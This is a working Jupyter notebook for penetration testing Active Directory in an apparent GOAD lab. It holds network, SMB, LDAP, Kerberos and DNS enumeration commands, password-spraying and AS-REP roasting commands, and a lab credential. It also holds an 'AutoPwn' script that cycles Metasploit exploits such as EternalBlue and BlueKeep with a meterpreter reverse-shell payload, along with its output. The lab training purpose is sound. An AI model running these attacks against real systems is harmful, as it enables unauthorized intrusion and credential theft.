# Introduction

Detailed in this Jupyter Notebook is the methodology utilized to Pen Test Active Directory. This Jupyter Notebook will also serve to standardize techniques across lab resources and train resources on a common methodology.

## Setup

Jupyter Notebooks have a kernel that can be either Python 3 (allowing you to execute Python code directly in code cells) or a Bash kernel (enabling you to run Linux commands). 

Most Kali Linux commands are executed in a Bash terminal, and you can change the Jupyter Notebook kernel to Bash via Kernel > Change Kernel or using the option in the top-right corner.

However, in this case, we will use Python and its os.system('command') function to execute Kali tools. This approach allows us to:

>Easily integrate Jupyter Notebook with Kali Linux tools.

>Capture command outputs for documentation.

>Analyze results using Python’s data science capabilities.

>Later, enhance analysis with Anaconda and DeepSeek.

Make sure to run the setup scripts to install the tools before hand, or via the below cells.

## Setup All Tools 

In [ ]:
import os
os.system('echo "kali" | sudo -S apt update && sudo -S apt install -y nmap nbtscan')

## Install Tools via Jupiter Notebook

I am experimenting with the best way to install tools to work interactively within Jupyter Notebook. Here are some examples:

In [ ]:
!echo "kali" | sudo apt update && apt install -y nmap


In [ ]:
!echo 'kali' | sudo apt upgrade -y nmap

In [ ]:
import os
os.system('echo "kali" | sudo -S apt update && sudo -S apt install -y nmap')

In [ ]:
import os
os.system('echo "kali" | sudo -S apt update && apt upgrade -y nmap')

In [ ]:
!nmap --version

In [ ]:
import os
os.system("nmap --version")

In [ ]:
import subprocess

# Define the nmap command
command = ["nmap", "-sP", "10.2.10.0/24"]

# Run the command and capture the output
result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)

# Print the output
if result.returncode == 0:
    print("Nmap scan results:")
    print(result.stdout)
else:
    print("Error running nmap:")
    print(result.stderr)

In [ ]:
# In another cell, you can use the information from previous result

print(result)

# Reconnaissance


> Always save your results for later analysie, create libary for later use and name each text tile. Then use all of the outputs to creat a report.

> Once the variables have been setup, you can Runtime, Run All to create the report.

## START TIME

In [ ]:
from datetime import datetime

now = datetime.now()

start_time = now.strftime("%H:%M:%S")
print("Start Time =", start_time)

#@ Defaults
Prior to running any cells assign a value to the variables and run the cell. This will change the targets for subdomain enumeration without needing to modify the script parameters. An example of an acceptable domain to replace the parameter with would be: "protiviti.com". Next set the ORG_NAME variable to the name of the target org.

In [ ]:
#Set DOMAIN & FOLDER_NAME Variable
DOMAIN = "example.com"
ORG_NAME = "example"
FOLDER_NAME = "example"
!mkdir $FOLDER_NAME

In [ ]:
print("The Following variables have been set:")
print("")
print("DOMAIN NAME: " + DOMAIN)
print("FOLDER NAME: " + FOLDER_NAME)
print("")

In [ ]:
print("Cloudenum in progress")
!python3 {configDict['cloudenum']['path']} -k $ORG_NAME -t 50 --disable-gcp --disable-azure -l cloudenum.csv
!mv --target-directory=$FOLDER_NAME/ cloudenum.csv
print("")
print("Cloudenum Complete")

## Network Discovery

In [ ]:
!ip a

In [ ]:
!for i in {1..255}; do ping -c 1 10.2.10.$i | grep "bytes from" | cut -d " " -f 4 | tr -d ":" & done

In [ ]:
# Create Targets.txt
!for i in {1..255}; do ping -c 1 10.2.10.$i | grep "bytes from" | cut -d " " -f 4 | tr -d ":" & done > targets.txt

In [ ]:
# Read and print the contents of targets.txt
with open('targets.txt', 'r') as file:
    targets = file.read()
print(targets)

In [ ]:
!nmap -n -sn 10.2.10.0/24 -oG - | awk '/Up$/{print $2}'

In [ ]:
# Scan for Open Ports (using nmap):

!nmap -sP 10.2.10.0/24
!nmap -p- -sCV -sS -T4 10.2.10.11 -vv
!nmap -n -sn 10.2.10.0/24 -oG - | awk '/Up$/{print $2}'
!nmap -iL targets.txt -sV --open -oG - | grep "Ports:"

nmap -sP -p <ip>  # ping scan
nmap -PN -sV --top-ports 50 --open <ip>  # quick scan
nmap -PN --script smb-vuln* -p139,445 <ip>  # search smb vuln
nmap -PN -sC -sV <ip>  # classic scan
nmap -PN -sC -sV -p- <ip>  # full scan
nmap -sU -sC -sV <ip>  # udp scan

In [ ]:
# Scan for open ports on a target Windows machine:

!nmap -p- -T4 10.2.10.0/24

In [ ]:
!nmap -sP 10.2.10.0/24

In [ ]:
!nmap -iL targets.txt -sV --open -oG - | grep "Ports:"

In [ ]:
!nmap -sP -iL targets.txt

In [ ]:
!nmap -p- -sCV -sS -T4 10.2.10.11 -vv

## Netbios Enumeration

In [ ]:
!nbtscan -f targets.txt

In [ ]:
!nbtscan -r 10.2.10.0/24
!nbtscan -v -s : 10.2.10.0/24

In [ ]:
!nmap -iL targets.txt -sU -p 137 --script nbstat.nse

In [ ]:
!crackmapexec smb 10.2.10.0/24 

## SMB Enumeration


In [2]:
# List SMB Shares (using smbclient):

!smbclient -L //10.2.10.11 -N
!smbclient -L //10.2.10.21 -N


Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.2.10.11 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
session setup failed: NT_STATUS_ACCESS_DENIED


SyntaxError: unterminated string literal (detected at line 31) (679302710.py, line 31)

In [3]:
!rpcclient -U "" -N 10.2.10.11

In [ ]:
!crackmapexec smb 10.2.10.0/24 # enumerate smb hosts

In [ ]:
!nslookup -type=SRV _ldap._tcp.dc._msdcs.ludus.domain 10.2.10.11

In [ ]:
!nslookup -type=SRV _ldap._tcp.dc._msdcs.ludus.domain 10.2.10.21

In [ ]:
!nmcli dev show eth0  # show domain name & dns

### Setup Keberos on Linux

setup /etc/hosts and kerberos

    To use kerberos in our Linux environment we will do some configurations.
    First we must set the DNS by configuring the /etc/hosts file

In [6]:
!msfconsole -q -x "search type:exploit platform:windows" | grep "exploit/" | awk '{print $2}' > windows_exploit_paths.txt

In [7]:
#!/usr/bin/env python3

import os
import subprocess

# AutoPwn Script for Windows Targets (Python 3)
# Ensure you have proper authorization before running this script.

# Variables
TARGET_IP = "10.2.10.11"  # Replace with the target IP
PAYLOAD = "windows/x64/meterpreter/reverse_tcp"  # Payload to use
LHOST = "10.2.10.1"  # Replace with your Kali IP
LPORT = "4444"  # Port for the reverse shell

# List of Windows Exploits to Try
EXPLOITS = [
    "exploit/windows/smb/ms17_010_eternalblue",
    "exploit/windows/smb/ms08_067_netapi",
    "exploit/windows/smb/psexec",
    "exploit/windows/smb/smb_delivery",
    "exploit/windows/http/rejetto_hfs_exec",
    "exploit/windows/http/badblue_passthru",
    "exploit/windows/rdp/cve_2019_0708_bluekeep",
    "exploit/windows/smb/ms10_061_spoolss",
    "exploit/windows/smb/ms06_040_netapi",
    "exploit/windows/smb/ms09_050_smb2_negotiate_func_index",
]

def run_exploit(exploit):
    """
    Run a Metasploit exploit and check if a session is created.
    """
    print(f"[*] Trying exploit: {exploit}")

    # Build the msfconsole command
    msf_command = (
        f"use {exploit}; "
        f"set RHOSTS {TARGET_IP}; "
        f"set PAYLOAD {PAYLOAD}; "
        f"set LHOST {LHOST}; "
        f"set LPORT {LPORT}; "
        "run; "
        "exit;"
    )

    # Run the exploit
    subprocess.run(["msfconsole", "-q", "-x", msf_command])

    # Check if a session was created
    sessions_output = subprocess.run(
        ["msfconsole", "-q", "-x", "sessions -l"],
        capture_output=True,
        text=True,
    )
    if "Session" in sessions_output.stdout:
        session_id = sessions_output.stdout.split("Session ")[1].split()[0]
        print(f"[+] Session created! Session ID: {session_id}")
        return True
    else:
        print("[-] Exploit failed. Trying next exploit...")
        return False

def main():
    """
    Main function to iterate through exploits.
    """
    for exploit in EXPLOITS:
        if run_exploit(exploit):
            break
    else:
        print("[-] No sessions created. All exploits failed.")

if __name__ == "__main__":
    main()

[*] Trying exploit: exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
RHOSTS => 10.2.10.11
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => 10.2.10.1
LPORT => 4444
[-] Handler failed to bind to 10.2.10.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] 10.2.10.11:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 10.2.10.11:445        - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.2.10.11:445        - Scanned 1 of 1 hosts (100% complete)
[-] 10.2.10.11:445 - The target is not vulnerable.
[*] Exploit completed, but no session was created.
[-] Exploit failed. Trying next exploit...
[*] Trying exploit: exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOSTS => 10.2.10.11
[-] The value specified for PAYLOAD is not valid.
LHOST => 10.2.10.1
LPORT => 4444
[-] Handler failed to bind to 10.2.10.1:4444:-  -
[*] Sta

[-] 10.2.10.11:445 - Exploit failed: windows/x64/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
[-] Exploit failed. Trying next exploit...
[-] No sessions created. All exploits failed.


In [ ]:
# /etc/hosts
# GOAD
10.2.10.11 ludus.domain


In [ ]:
!echo kali | sudo apt install krb5-user

In [ ]:
!nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='<domain>', userdb=<users_list_file>" <ip>
!ls

In [ ]:
!crackmapexec smb 10.2.10.0/24 -u 'none' -p '' --shares 

In [ ]:
!crackmapexec smb 10.2.10.0/24 --users

In [ ]:
!netexec smb 10.2.10.0/24  

In [ ]:
# Check for Null Session Vulnerability (using rpcclient):

!rpcclient -U administrator 10.2.10.11
!rpcclient -U "" 10.2.10.11

In [ ]:
# Enumerate SMB Users (using enum4linux):

#!enum4linux -U 10.2.10.11
!enum4linux-ng -A 10.2.10.11
!enum4linux-ng -A 10.2.10.21

In [ ]:
!nmap -p- -sC -sV 10.2.10.0/24 -Pn -oA allports.nmap

In [ ]:
!netexec smb 10.2.10.0/24

## Recon

In [ ]:
#enum4linux -U <dc-ip> | grep 'user:'
!enum4linux -U 10.2.10.11 | grep 'user:'

In [ ]:


---------
nmcli dev show eth0  # show domain name & dns
nslookup -type=SRV _ldap._tcp.dc._msdcs.//DOMAIN/
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
---------
setup /etc/hosts and kerberos

# /etc/hosts
# GOAD
192.168.56.10   sevenkingdoms.local kingslanding.sevenkingdoms.local kingslanding
192.168.56.11   winterfell.north.sevenkingdoms.local north.sevenkingdoms.local winterfell
192.168.56.12   essos.local meereen.essos.local meereen
192.168.56.22   castelblack.north.sevenkingdoms.local castelblack
192.168.56.23   braavos.essos.local braavos

sudo apt install krb5-user

---
/etc/krb5.conf 

[libdefaults]
  default_realm = essos.local
  kdc_timesync = 1
  ccache_type = 4
  forwardable = true
  proxiable = true
  fcc-mit-ticketflags = true
[realms]
  north.sevenkingdoms.local = {
      kdc = winterfell.north.sevenkingdoms.local
      admin_server = winterfell.north.sevenkingdoms.local
  }
  sevenkingdoms.local = {
      kdc = kingslanding.sevenkingdoms.local
      admin_server = kingslanding.sevenkingdoms.local
  }
  essos.local = {
      kdc = meereen.essos.local
      admin_server = meereen.essos.local
  }
...
---

dpkg-reconfigure krb5-config
getTGT.py essos.local/khal.drogo:horse

export KRB5CCNAME=/workspace/khal.drogo.ccache 
smbclient.py -k @braavos.essos.local

## AD Username and password list from Website

## Create Username list from LinkedIn


https://github.com/initstring/linkedin2username

linkedin2username.py -c targetco -d 5 -n 'targetco.com'


usage: linkedin2username.py [-h] -c COMPANY [-n DOMAIN] [-d DEPTH]
  [-s SLEEP] [-x PROXY] [-k KEYWORDS] [-g] [-o OUTPUT]

OSINT tool to generate lists of probable usernames from a given company's LinkedIn page.
This tool may break when LinkedIn changes their site.
Please open issues on GitHub to report any inconsistencies.

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name exactly as typed in the company linkedin profile page URL.
  -n DOMAIN, --domain DOMAIN
                        Append a domain name to username output.
                        [example: "-n targetco.com" would output jschmoe@targetco.com]
  -d DEPTH, --depth DEPTH
                        Search depth (how many loops of 25). If unset, will try to grab them
                        all.
  -s SLEEP, --sleep SLEEP
                        Seconds to sleep between search loops. Defaults to 0.
  -x PROXY, --proxy PROXY
                        Proxy server to use. WARNING: WILL DISABLE SSL VERIFICATION.
                        [example: "-p https://localhost:8080"]
  -k KEYWORDS, --keywords KEYWORDS
                        Filter results by a a list of command separated keywords.
                        Will do a separate loop for each keyword,
                        potentially bypassing the 1,000 record limit.
                        [example: "-k 'sales,human resources,information technology']
  -g, --geoblast        Attempts to bypass the 1,000 record search limit by running
                        multiple searches split across geographic regions.
  -o OUTPUT, --output OUTPUT
                        Output Directory, defaults to li2u-output

## LDAP Enumeration

In [ ]:
ldapsearch -x -h 10.2.10.11 -b "DC=domain,DC=com" -s sub "(objectClass=*)" 

In [ ]:
# Extract Users from LDAP:

ldapsearch -x -h 192.168.1.1 -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName #> users.txt

In [ ]:
# Extract Computers from LDAP:

ldapsearch -x -h 192.168.1.1 -b "DC=domain,DC=com" "(objectClass=computer)" name #> computers.txt


## Kerberos Enumeration

In [ ]:
# Enumerate Kerberos Users (using kerbrute):

kerbrute userenum --dc 192.168.1.1 -d domain.com users.txt

In [ ]:
# Request a Kerberos Ticket (using impacket):

python3 GetNPUsers.py domain.com/ -usersfile users.txt -no-pass

In [ ]:
## DNS Enumeration

In [ ]:
# Query DNS for Domain Records (using dig):

dig @192.168.1.1 domain.com ANY

In [ ]:
# Perform a Zone Transfer (if allowed):

dig axfr @192.168.1.1 domain.com

In [ ]:
# Enumerate DNS Records (using dnsenum):

dnsenum domain.com

## Password Spraying

In [ ]:
# Perform a Password Spray Attack (using crackmapexec):

crackmapexec smb 192.168.1.1 -u users.txt -p passwords.txt

In [ ]:
# BloodHound Data Collection (Linux) Use SharpHound (via impacket or bloodhound-python):

bloodhound-python -d domain.com -u username -p password -ns 192.168.1.1 -c All


In [ ]:
# NTLM Authentication Testing: Check for NTLM Authentication (using ntlm-info):

ntlm-info -t 192.168.1.1

In [ ]:
# SNMP Enumeration: Enumerate SNMP Information (using snmpwalk):

snmpwalk -c public -v1 192.168.1.1

In [ ]:
# Vulnerability Scanning: Scan for Vulnerabilities (using nikto or nmap):

nikto -h 192.168.1.1
nmap --script vuln 192.168.1.1

# END TIME

In [ ]:
now = datetime.now()

end_time = now.strftime("%H:%M:%S")
print("End Time =", end_time)

# Parsing Script & Excel Deliverable Serialization

In [ ]:
#REQ: import requirements: pandas, openpyxl
import pandas as pd
import os
import csv
import glob
import xlsxwriter
import openpyxl


#path to parse to and read files from
path = "/root/.jupyter/{}/".format(FOLDER_NAME)

#all files ending in .csv
all_files = glob.glob(os.path.join(path, "*.csv"))

#initialize writer
writer = pd.ExcelWriter('/root/.jupyter/' + FOLDER_NAME + '/' + FOLDER_NAME + '_OSINT.xlsx', engine='openpyxl')

#write all files into excel from dataframes and name worksheet by filename 
print("The following files are being parsed to " + path + ":") 
print("")
for f in all_files:
    df = pd.read_csv(f)
    print(f)
    df.to_excel(writer, sheet_name=os.path.basename(f))

writer.save()  

print("")
print("Parsing of " + FOLDER_NAME + "_OSINT.xlsx Complete")

# Use Deepseek to review results

In [ ]:
import requests

# Define the API endpoint (replace with DeepSeek's actual API endpoint)
api_url = "https://api.deepseek.com/review"

# Prepare the payload (send the nmap output)
payload = {
    "output": nmap_output
}

# Send the request to the API
response = requests.post(api_url, json=payload)

# Check if the request was successful
if response.status_code == 200:
    review_results = response.json()
    print("DeepSeek Review Results:")
    print(review_results)
else:
    print("Error sending request to DeepSeek API:", response.status_code)

# Reference

- Recon: https://chat.deepseek.com/a/chat/s/5d783f90-4e9a-4af1-9ac9-538eeec422d0
- GOAD Walk thru: https://mayfly277.github.io/posts/GOADv2-pwning-part2/
- The Bear Necessities: https://spellzed.github.io/spellzedblog/2025/03/03/the-bear-necessities.html#lab-environment
- Game Of Active Directory, Learn how to attack and detect AD attacks: https://www.youtube.com/watch?v=XjgxQ6gHfyU
- DEF CON 32 - Winning the Game of Active Directory - Brandon Colley: https://www.youtube.com/watch?v=M-2d3sM3I2o&t=79s
- A Drop of Jupyter: A Modular Approach to Penetration Testing: https://www.youtube.com/watch?v=LTNKMA65BtI
- https://github.com/obheda12/JupyterPen
- https://github.com/obheda12/OSINT-Threat-Intel-Scripts
- Deepseek hacking AD - nmap -p- -sC -sV 10.2.10.0/24 -Pn -oA allports.nmap